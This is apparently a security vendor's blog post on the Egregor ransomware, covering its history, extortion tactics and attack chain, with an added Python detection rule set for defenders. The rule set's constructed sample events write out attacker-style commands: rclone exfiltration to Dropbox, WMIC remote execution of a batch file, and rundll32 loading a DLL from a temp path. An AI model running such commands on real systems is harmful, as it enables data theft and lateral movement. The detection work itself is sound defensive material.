By Bhabesh Raj Rai, Associate Security Analytics Engineer at LogPoint
Egregor, a variant of the Sekhmet ransomware family, is among the most active and aggressive ransomware strains of the past year and is widely considered the successor to the Maze ransomware. Several security researchers have independently concluded that Egregor is used together with malware such as Qakbot, IcedID, and Ursnif to gain initial access to victims' systems.
Egregor first appeared in mid-September 2020, at the same time as the operators of the Maze ransomware publicly announced their retirement. In that short time, Egregor has carried out numerous infections, including at well-known companies such as Kmart, Ubisoft, Crytek, and Randstad. The surge in Egregor activity signals that Maze's affiliates switched to Egregor quickly and smoothly.
Egregor follows the same ransomware-as-a-service (RaaS) model as other popular ransomware strains such as Ryuk and Maze. Under RaaS, cybercriminals subscribe to the use of Egregor, so even inexperienced actors can launch complex ransomware attacks. Another reason for Egregor's rapid spread is the highly effective double-extortion tactic: the criminals first steal sensitive data, then encrypt it to deny the victim access, and finally publish part of the stolen data as proof of exfiltration.
Double extortion puts the greatest possible pressure on victims to pay the ransom, and it works. Arete IR determined that Egregor's average ransom demand is $3,407,119, with an average downtime of 12 days. Egregor's operators are known for their negotiating style: after encrypting a victim's systems, they issue an ultimatum that the stolen data will be published if they receive no response within 72 hours. Like Maze and Ryuk, Egregor targets large companies, which can pay a high ransom and therefore yield significant profits.
A typical Egregor attack begins with a malicious Microsoft Office document attached to a phishing email as the initial infection vector. When the document is opened, its macro can download malware such as Qakbot or IcedID. The downloaded malware then starts reconnaissance of the host and network, collecting credentials that can be used for lateral movement, for which it uses either PsExec or WMI. In some cases, Egregor actors have also used Cobalt Strike. At the end of the infection chain, the malware usually downloads a batch file and a zip file. The zip file contains the RClone tool together with its configuration files, used to exfiltrate data to cloud file-hosting services such as DropBox or OneDrive. The batch file contains a command to download and run the Egregor DLL via rundll32.
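The chain just described (an Office macro spawning a command host, PsExec or WMI for lateral movement, RClone for cloud exfiltration, and rundll32 loading the ransomware DLL) maps to a handful of process-creation detections. The rule set below is an added example, not one of LogPoint's queries and not code from Egregor or any of the tools named above. It assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), a trusted-directory allow-list for rundll32 arguments that would need tuning per environment, and constructed sample events whose paths, file names and host names are all made up.

```python
"""Added example: flag Egregor-style TTPs in Sysmon-like process-creation events.
Field names follow Sysmon Event ID 1; all sample values are constructed."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
Alert = Dict[str, object]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children an Office document should not normally spawn (assumption; extend as needed).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Assumed allow-list: DLLs that rundll32 legitimately loads usually live here.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
PSEXEC_NAMES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}  # client and service side
# First argument after rundll32[.exe], optionally quoted, up to the ".dll" suffix.
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_office_spawn(ev: Event) -> str:
    """Phishing document stage: an Office app launching a command/script host."""
    if basename(ev["ParentImage"]) in OFFICE_APPS and basename(ev["Image"]) in SUSPICIOUS_CHILDREN:
        return "T1566.001 Office application spawned a command/script host"
    return ""


def check_rundll32(ev: Event) -> str:
    """Final stage: rundll32 loading a DLL from outside the trusted directories."""
    if basename(ev["Image"]) != "rundll32.exe":
        return ""
    match = RUNDLL_ARG.search(ev["CommandLine"])
    if not match:
        return ""
    dll = match.group(1).strip().lower()
    if not dll.startswith(TRUSTED_DLL_DIRS):
        return f"T1218.011 rundll32 loaded DLL from untrusted path: {dll}"
    return ""


def check_rclone(ev: Event) -> str:
    """Exfiltration stage: rclone by name, or a renamed binary given an explicit
    config file and one of the cloud providers named in the write-up."""
    cmd = ev["CommandLine"].lower()
    if basename(ev["Image"]) == "rclone.exe" or (
            "--config" in cmd and re.search(r"\b(dropbox|onedrive)\b", cmd)):
        return "T1567.002 rclone transfer to cloud storage (possible exfiltration)"
    return ""


def check_lateral(ev: Event) -> str:
    """Lateral movement: PsExec on either side, WMI on the source (wmic process
    call create) or on the target (shell spawned by the WMI provider host)."""
    img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    if img in PSEXEC_NAMES:
        return "T1021.002 PsExec execution"
    if img == "wmic.exe" and "process call create" in cmd:
        return "T1047 WMI remote process creation"
    if parent == "wmiprvse.exe" and img in {"cmd.exe", "powershell.exe"}:
        return "T1047 shell spawned by WMI provider host"
    return ""


CHECKS: Tuple[Callable[[Event], str], ...] = (
    check_office_spawn, check_rundll32, check_rclone, check_lateral)


def detect(events: List[Event]) -> List[Alert]:
    """Run every check over every event; one alert per (event, matching check)."""
    alerts: List[Alert] = []
    for index, ev in enumerate(events):
        for check in CHECKS:
            detail = check(ev)
            if detail:
                alerts.append({"event": index, "technique": detail.split()[0], "detail": detail})
    return alerts


# Constructed telemetry: one benign rundll32 event (index 2) among the suspicious ones.
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'cmd.exe /c "C:\\Users\\user\\AppData\\Local\\Temp\\stage.bat"'},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\Public\\temp\\update.dll,DllRegisterServer"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Users\\Public\\temp\\rclone.exe",
     "CommandLine": "rclone.exe copy C:\\Shares\\Finance dropbox:archive --config C:\\Users\\Public\\temp\\rclone.conf"},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic /node:"FILESRV-PLACEHOLDER" process call create "cmd.exe /c C:\\Users\\Public\\temp\\stage.bat"'},
    {"ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\PSEXESVC.exe",
     "CommandLine": "C:\\Windows\\PSEXESVC.exe"},
    {"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"event {alert['event']}: {alert['detail']}")
```

Each check is deliberately narrow so that it can be turned into a single SIEM query; the rundll32 rule is the one that needs the most tuning, because some installers and management agents legitimately load DLLs from user-writable paths, and those should be added to the allow-list rather than suppressed wholesale.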
In February 2021, a joint investigation by French and Ukrainian police led to the arrest of several customers of the Egregor RaaS. However, the authorities believe that none of those arrested belong to Egregor's core operational team, so the arrests are unlikely to lead to a permanent shutdown of the Egregor ransomware family.
Using the MITRE ATT&CK framework and LogPoint, blue teams can track Egregor at every stage of an attack. Threat hunters can use the queries listed below to hunt for Egregor's various tactics, techniques, and procedures (TTPs).